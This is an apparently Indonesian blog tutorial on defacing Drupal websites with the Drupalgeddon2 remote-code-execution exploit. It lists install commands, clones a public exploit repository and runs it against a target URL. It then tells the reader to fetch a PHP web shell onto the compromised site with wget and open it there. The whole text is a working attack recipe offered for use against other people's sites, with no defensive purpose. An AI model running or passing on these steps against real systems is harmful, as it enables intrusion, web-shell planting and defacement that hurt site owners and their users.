Cara Deface Drupal RCE Via DrupalGeddon2

Nelo.F4 - Hallo, udah lama ga update sekali update cuma ngasih tutor install drupal RCE aja hehe. oke gapake lama lama udah pada taukan RCE itu apa? yap RCE adalah singkatan dari Remote Code Execution dimana kita bisa memasukan berbagai perintah layaknya seperti di CMD atau di TERMUX. misal kita masukan command/perintah ls dan Wget untuk menanam shell.

Tested On Linux Mint 19.x Mate

Bahan-Bahan:
Ruby
Git
Terminal/Termux
Akses Internet
Target.

Pertama kalian lakukan adalah menginstall ruby.
$ sudo apt-get install ruby
jika kalian user termux ketik perintah dibawah
$ apt install ruby

Next install gem terlebih dahulu.
$ sudo apt-get install gem
user termux ikuti perintah dibawah
$ apt install gem

Selanjutnya kalian install git
$ sudo apt-get install git
User Termux ikuti perintah dibawah
$ apt install git

jika sudah ikuti perintah dibawah ini untuk menginstall high line.
$ sudo gem install high line
untuk user termux
$ gem install high line

sekarang finishim kita git repositorynya.
$ git clone https://github.com/dreadlocked/Drupalgeddon2

Oke lanjut kita coba toolsnya.
$ cd Drupalgeddon2
$ ruby drupalgeddon2.rb http://sitetarget.com
Hasilnya seperti gambar dibawah ini.

Jika sudah sepeti gambar diatas kalian wget aja nanti tinggal ekse shell kalian di www.site.com/namashell.php

Goodluck!

Bagikan Artikel ini